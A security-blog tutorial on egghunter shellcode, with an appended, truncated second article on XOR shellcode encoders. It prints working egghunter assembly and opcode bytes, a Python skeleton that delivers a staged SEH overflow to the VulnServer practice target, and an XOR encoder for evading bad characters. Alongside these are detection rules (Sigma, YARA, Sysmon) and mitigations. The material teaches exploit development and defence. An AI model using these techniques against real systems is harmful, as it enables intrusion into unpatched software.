Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.


1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

  • At least ~32 reachable bytes to hold the hunter itself.
  • The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.


2. The Page-Walk Problem

x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses; it jumps straight to the next page boundary and probes again. Inside a valid page it advances one byte at a time, comparing the DWORD at each address against the tag.
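The boundary arithmetic is easy to check outside a debugger. The following is a minimal Python sketch that models EDX as a masked 32-bit integer; the function names are illustrative and do not come from any tool.

```python
MASK32 = 0xFFFFFFFF

def or_dx_0fff(edx: int) -> int:
    """Model OR DX, 0x0FFF: set the low 12 bits, leave the rest of EDX alone."""
    return (edx | 0x0FFF) & MASK32

def next_page(edx: int) -> int:
    """Model OR DX, 0x0FFF followed by INC EDX (wraps at 2**32 like the register)."""
    return (or_dx_0fff(edx) + 1) & MASK32

if __name__ == "__main__":
    for addr in (0x00401234, 0x00401FFF, 0xFFFFF123):
        print(f"{addr:#010x} -> end of page {or_dx_0fff(addr):#010x}, "
              f"next page {next_page(addr):#010x}")
```

Any address inside a page maps to the same next-page value, which is why a faulting probe costs one iteration per page instead of 4096.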

The brief table of moving parts:

Component                 Detail
------------------------  --------------------------------------------------------------
Memory iterator register  EDX holds the current scan address
Page-boundary jump        OR DX, 0x0FFF → end of page; INC EDX → start of next page
Validity probe            A syscall (or an SEH frame) tests whether the page is readable
Egg comparison            SCASD compares EAX to [EDI] and auto-increments EDI
Transfer to payload       JMP EDI once both halves of the egg match

[Figure: flowchart of the egghunter page-walk loop: snapping EDX to page boundaries with OR DX, 0x0FFF, probing validity via INT 0x2E, skipping on access violation, scanning with SCASD, and jumping to the payload on an egg match.]
The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.
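The scan-and-match logic can be modeled in a few lines of Python, which makes it easy to see why a lone copy of the tag is ignored. This is a sketch under stated assumptions: memory is a hypothetical dict of page base address to 4 KB of bytes, a missing key stands in for the access-violation result, and the scan starts at address 0 rather than wherever EDX happens to point.

```python
PAGE = 0x1000
EGG = b"w00t" * 2          # the doubled tag

def read(pages: dict, addr: int, n: int):
    """Return n bytes at addr, or None if any byte sits in an unmapped page."""
    out = bytearray()
    for a in range(addr, addr + n):
        page = pages.get(a & ~(PAGE - 1))
        if page is None:
            return None
        out.append(page[a & (PAGE - 1)])
    return bytes(out)

def hunt(pages: dict, limit: int = 0x10000):
    """Model of the scan loop: address just past the egg, or None."""
    addr = 0
    while addr < limit:
        if (addr & ~(PAGE - 1)) not in pages:   # stands in for the syscall probe
            addr = (addr | (PAGE - 1)) + 1      # OR DX,0x0FFF ; INC EDX
            continue
        if read(pages, addr, 8) == EGG:         # both SCASD compares succeed
            return addr + 8                     # where JMP EDI would land
        addr += 1                               # INC EDX, one byte at a time
    return None

def page_with(data: bytes, offset: int) -> bytes:
    """Build one zero-filled 4 KB page with data placed at offset."""
    page = bytearray(PAGE)
    page[offset:offset + len(data)] = data
    return bytes(page)

if __name__ == "__main__":
    pages = {
        0x3000: page_with(b"w00t", 0x40),        # single tag: must be ignored
        0x7000: page_with(EGG + b"\xcc", 0x10),  # real egg followed by a payload byte
    }
    print(hex(hunt(pages)))
```

The page at 0x3000 holds the tag once and is passed over; only the doubled tag at 0x7010 ends the scan, and the returned address is the byte immediately after it.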

Identifier                 Value / Note
-------------------------  ------------------------------------
Syscall                    NtAccessCheckAndAuditAlarm
Syscall number (x86 XP–7)  0x02
Invocation                 INT 0x2E
Access-violation status    0xC0000005, tested with CMP AL, 0x05
Invalid-page action        JE loop_inc_page
Size                       ~32 bytes

Syscall numbers are OS-version specific. 0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.


4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler            ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret

Feature            Syscall variant                        SEH variant
-----------------  -------------------------------------  ----------------------------------
Size               ~32 bytes                              ~60 bytes
Validity check     INT 0x2E → NtAccessCheckAndAuditAlarm  Custom FS:[0] handler
OS portability     Fragile (syscall # changes)            More portable
Detection surface  INT 0x2E is glaring                    Quieter, but installs an SEH frame

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.


[Figure: hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.]
The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters. \x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

Second, and easy to forget: the doubled tag must be unique in process memory ahead of the payload. A lone 4-byte copy is harmless; the hunter carries one itself in its MOV EAX immediate, which is exactly why the egg is written twice. But if the full 8-byte sequence appears anywhere before your real payload, including elsewhere in your own crafted buffer, the hunter will jump there first and execute garbage. Check your buffer before sending:

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    egg   = tag * 2                         # the real, doubled egg
    first = buffer.find(egg)
    if first == -1:
        print(f"[!] doubled tag {egg!r} not found in buffer")
        return False
    again = buffer.find(egg, first + 1)     # any second doubled hit?
    if again != -1:
        print(f"[!] doubled tag {egg!r} appears at offsets {first} and {again}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

The CS segment selector reveals the mode: 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then calls through the pointer stored at FS:[0xC0], the WoW64 transition stub, which performs the far jump into 64-bit code.

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; indirect call via FS:[0xC0] -> WoW64 transition to 64-bit mode
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.


7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...

#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)
    s.send(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
    s.send(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter

[Figure: flow diagram of a staged SEH overflow layout: padding leading to the nSEH short jump, the SEH POP-POP-RET gadget, the egghunter in the constrained overflow buffer, and the egg-tagged full payload delivered separately in another request field.]
The egg-tagged payload must arrive in a separate request before the overflow trigger is sent — reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.
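The "jmp +6" in nSEH is worth checking by arithmetic rather than by eye, since an off-by-two here lands execution inside the SEH record. A minimal sketch, using the same placeholder offset (66) and placeholder gadget bytes as the skeleton above; short_jmp_target is an illustrative helper, not part of any library.

```python
def short_jmp_target(insn_offset: int, insn: bytes) -> int:
    """Destination offset of a 2-byte JMP SHORT (EB rel8) located at insn_offset."""
    if len(insn) < 2 or insn[0] != 0xEB:
        raise ValueError("not a JMP SHORT")
    rel8 = insn[1] - 0x100 if insn[1] >= 0x80 else insn[1]   # rel8 is signed
    return insn_offset + 2 + rel8          # relative to the end of the instruction

PAD = 66                                   # placeholder offset from the skeleton
nseh = b"\xeb\x06\x90\x90"
seh = b"\x42\x42\x42\x42"                  # placeholder gadget address
hunter_at = PAD + len(nseh) + len(seh)     # first byte of the egghunter

if __name__ == "__main__":
    print(short_jmp_target(PAD, nseh), hunter_at)
```

The displacement is counted from the end of the two-byte jump, so 6 covers the two NOP filler bytes in nSEH plus the four-byte SEH record.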


8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

  1. Attach VulnServer in Immunity Debugger or x64dbg.
  2. Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
  3. Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
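  4. Generate the hunter with mona: !mona egg -t w00t (add -cpb with your bad-character list if the hunter itself must be encoded; confirm the options with !mona help egg on your version). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.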
  5. Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.


9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

  • A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
  • NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.

Event ID  Name                Relevance
--------  ------------------  ----------------------------------------------------------------
1         Process Creation    Baseline parent-child chain for the vulnerable service
8         CreateRemoteThread  Egg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules (a shellcode tell)
10        ProcessAccess       Cross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002)
25        ProcessTampering    Sysmon 13+; in-memory image diverging from disk, a hallmark of in-memory execution

The default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of its kernel32.dll exclusions; tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader   # placeholder, not a valid UUID; generate a real UUIDv4 before deploying
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688 with command lines. And flag INT 0x2E in user mode wherever EDR or ETW lets you — it’s about as high-fidelity as indicators get.
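The syscall-burst tell from the start of this section can be prototyped offline against exported trace data. The sketch below assumes a hypothetical event format of (timestamp in seconds, thread ID, syscall name) tuples; the one-second window and the 1000-call threshold are illustrative starting points, not tuned values.

```python
from collections import deque

def burst_threads(events, name="NtAccessCheckAndAuditAlarm",
                  window=1.0, threshold=1000):
    """Return thread IDs that issue `name` at least `threshold` times within `window` seconds.

    events: iterable of (timestamp_seconds, thread_id, syscall_name),
            in chronological order per thread.
    """
    recent = {}          # thread_id -> deque of timestamps still inside the window
    flagged = set()
    for ts, tid, syscall in events:
        if syscall != name:
            continue
        q = recent.setdefault(tid, deque())
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that aged out
            q.popleft()
        if len(q) >= threshold:
            flagged.add(tid)
    return flagged

if __name__ == "__main__":
    noisy = [(i * 0.0001, 4242, "NtAccessCheckAndAuditAlarm") for i in range(5000)]
    quiet = [(float(i), 77, "NtAccessCheckAndAuditAlarm") for i in range(10)]
    print(burst_threads(noisy + quiet))
```

Keying the window per thread matters: an egghunter runs on one thread, so a per-process count would blur it together with unrelated activity.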

YARA pins the syscall hunter’s opcode signature for memory forensics:

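rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }        // or dx, 0x0fff
        $syscall   = { CD 2E }                 // int 0x2e
        $av_check  = { 3C 05 }                 // cmp al, 0x05
        $scasd     = { AF 75 ?? AF 75 ?? }     // scasd / jnz / scasd / jnz
    condition:
        // Anchor every check to one $page_walk hit so all pieces must sit
        // inside the same 32-byte window (first-match offsets alone can
        // pair unrelated hits or go negative).
        for any i in (1..#page_walk) : (
            $syscall  in (@page_walk[i] .. @page_walk[i] + 16) and
            $av_check in (@page_walk[i] .. @page_walk[i] + 16) and
            $scasd    in (@page_walk[i] .. @page_walk[i] + 32)
        )
}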
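For triage without YARA on hand, the same opcode window can be approximated with a regular expression over a raw memory dump. This is a sketch, not a replacement for the rule: the gap sizes are assumptions fitted to the canonical 32-byte hunter shown earlier, and find_hunters is an illustrative name. As a bonus it captures the 4-byte tag from the MOV EAX immediate, which tells you what egg to search the rest of the dump for.

```python
import re

HUNTER_RE = re.compile(
    rb"\x66\x81\xca\xff\x0f"        # or dx, 0x0fff
    rb".{0,8}?\xcd\x2e"             # ... int 0x2e
    rb"\x3c\x05"                    # cmp al, 0x05
    rb".{0,4}?\xb8(.{4})"           # ... mov eax, <tag>  (tag captured)
    rb".{0,4}?\xaf\x75.\xaf\x75.",  # scasd / jnz / scasd / jnz
    re.DOTALL,
)

def find_hunters(dump: bytes):
    """Yield (offset, tag) for each syscall-hunter-shaped window in dump."""
    for m in HUNTER_RE.finditer(dump):
        yield m.start(), m.group(1)

if __name__ == "__main__":
    hunter = (
        b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
        b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    )
    dump = b"\x90" * 16 + hunter + b"\x00" * 8
    print(list(find_hunters(dump)))
```

Encoded hunters will not match this pattern (or the YARA rule), which is one more reason to pair static signatures with the behavioral indicators above.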

10. Tools for Egghunter Analysis

Tool                   Description                                            Link
---------------------  -----------------------------------------------------  ---------------------------
mona.py                Generates/verifies egghunters (!mona egg) in Immunity  corelan.be
Immunity Debugger      Classic exploit-dev debugger, mona host                immunityinc.com
x64dbg                 Free user-mode debugger for stepping the scan          x64dbg.com
VulnServer             Safe, intentionally vulnerable practice target         github.com
Process Hacker         Spot the 100% CPU thread and handle access             processhacker.sourceforge.io
Sysmon                 EID 8/10/25 telemetry for shellcode behavior           microsoft.com
j00ru syscall table    Authoritative per-OS syscall numbers                   j00ru.vexillium.org
osed-scripts (epi052)  Egghunter generator and OSED helpers                   github.com

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

Mitigation           Effect on the technique
-------------------  ------------------------------------------------------------------------
DEP / NX             Payload on stack/heap won’t execute; primary kill switch for legacy targets
ASLR                 Hardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise
Control Flow Guard   Validates indirect call targets in instrumented code, so it can block the initial hijack; it does not police the hunter’s own JMP EDI
GS / stack canaries  Don’t stop the hunter, but can stop the overflow that delivers it
App sandboxing       Limits post-execution blast radius

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.


12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

Technique                                               MITRE ID   Detection
------------------------------------------------------  ---------  -----------------------------------------
Exploitation for Client Execution                       T1203      Service crash/recover, EID 1 anomalies
Process Injection                                       T1055      Sysmon EID 8/10, TI ETW
Process Injection: DLL Injection                        T1055.001  EID 8 with empty StartModule
Reflective Code Loading                                 T1620      In-memory PE, EID 25 ProcessTampering
Obfuscated Files or Information                         T1027      Encoded egg payload, YARA on decoder stubs
Virtualization/Sandbox Evasion: Time Based Evasion      T1497.003  CPU-spike artifact in sandboxes

Summary

  • An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
  • The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
  • The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
  • Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
  • Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.

Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

Byte  Name             Why it breaks things
----  ---------------  ------------------------------------------------------------
\x00  NULL             Terminates C strings; strcpy/sprintf stop copying here
\x0a  Line Feed        Read as end-of-input by line-oriented protocols and by gets()
\x0d  Carriage Return  Paired with \x0a in HTTP/SMTP headers; often stripped
\x20  Space            Token delimiter in many parsers
\xff  0xFF             Sentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A

A  K  A ⊕ K
-  -  -----
0  0  0
0  1  1
1  0  1
1  1  0
There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.
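Two consequences of the XOR contract are worth seeing concretely: the round trip is exact, and any key equal to a byte in the payload encodes that byte to \x00. A minimal sketch; the sample bytes and bad-character set are arbitrary demo values and the helper names are illustrative.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)

def key_is_clean(data: bytes, key: int, bad: set) -> bool:
    """True when neither the key nor any encoded byte is a bad character."""
    return key not in bad and all((b ^ key) not in bad for b in data)

def null_producing_keys(data: bytes) -> set:
    """Keys that encode some byte to 0x00: exactly the byte values present in data."""
    return set(data)

if __name__ == "__main__":
    sample = bytes([0x31, 0xC0, 0xB0, 0x01])   # arbitrary demo bytes
    bad = {0x00, 0x0A, 0x0D}
    print(xor_bytes(xor_bytes(sample, 0xAA), 0xAA) == sample)
    print(key_is_clean(sample, 0x01, bad), key_is_clean(sample, 0x02, bad))
    print(sorted(hex(k) for k in null_producing_keys(sample)))
```

Key 0x01 fails here because the sample contains 0x01, and 0x01 ⊕ 0x01 is 0x00. The larger the payload, the more byte values it contains and the fewer keys survive.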


[Figure: flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target.]
XOR encoding and decoding are symmetric operations — the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the first byte that failed to arrive, the one at the index where the copy stopped, is usually the terminator. Note it, exclude it, run again.
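The four-step loop above can be rehearsed end to end against a simulated target before touching a debugger. In this sketch toy_transport is a hypothetical stand-in for the real delivery path (it stops at NUL and strips carriage returns); in practice that function would be replaced by "send the pattern, dump the buffer".

```python
def make_pattern(bad: set) -> bytes:
    """All byte values 0x00-0xff except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in bad)

def first_mismatch(expected: bytes, received: bytes):
    """Index of the first differing or missing byte, or None if identical."""
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i
    if len(expected) != len(received):
        return min(len(expected), len(received))
    return None

def discover_bad(transport) -> set:
    """Repeat send/diff/exclude until the pattern survives intact."""
    bad = set()
    while True:
        pattern = make_pattern(bad)
        i = first_mismatch(pattern, transport(pattern))
        if i is None:
            return bad
        if i >= len(pattern):
            raise RuntimeError("transport appended bytes; inspect manually")
        bad.add(pattern[i])          # the byte we sent at the first bad index

def toy_transport(data: bytes) -> bytes:
    """Stand-in for the target: stops at NUL like strcpy and strips CR."""
    return data.split(b"\x00")[0].replace(b"\x0d", b"")

if __name__ == "__main__":
    print(sorted(hex(b) for b in discover_bad(toy_transport)))
```

Only one byte is blamed per round. A stripped byte shifts everything after it, so later mismatches in the same dump are not trustworthy until the pattern is regenerated.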


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

